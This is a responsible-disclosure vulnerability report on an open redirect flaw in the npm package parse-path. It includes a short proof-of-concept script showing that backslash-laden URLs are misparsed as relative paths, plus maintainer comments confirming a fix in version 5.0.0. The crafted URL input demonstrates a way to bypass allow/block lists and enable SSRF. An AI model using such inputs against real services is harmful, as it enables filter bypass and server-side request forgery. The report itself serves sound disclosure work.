Open Redirect in ionicabizau/parse-path

Valid

Reported on

Jul 8th 2021

✍️ Description

parse-path mishandles certain uses of backslash such as https:/\ and interprets the URI as a relative path. Browsers accept backslashes after the protocol, and treat it as a normal slash, while parse-path sees it as a relative path. Which will lead to SSRF attacks, open redirects, or other undesired behavior.

Similar to CVE-2021-27515, CVE-2021-27516

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var parsePath = require("parse-path")
var u= parsePath("https:/\/\/\github.com/foo/bar")
console.log(u)

Execute the following commands in another terminal:

npm i parse-path # Install affected module
node poc.js #  Run the PoC

Check the Output:

{
protocols: ["https"]
protocol: "https"
port: null
resource: ""
user: ""
pathname: "/github.com/foo/bar"
hash: ""
search: ""
href: "https:///github.com/foo/bar"
query: Object {}
}

💥 Impact

Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.

We have contacted a member of the ionicabizau/parse-path team and are waiting to hear back 2 years ago

Ionică Bizău (Johnny B.) validated this vulnerability 2 years ago

ready-research has been awarded the disclosure bounty

The fix bounty is now up for grabs

Ionică Bizău (Johnny B.) Ionică

commented 2 years ago

Maintainer

A fix would be very welcomed! Thank you very much for the report.

Ionică Bizău (Johnny B.) marked this as fixed in 5.0.0 with commit f9ad88 a year ago

Ionică Bizău (Johnny B.) has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation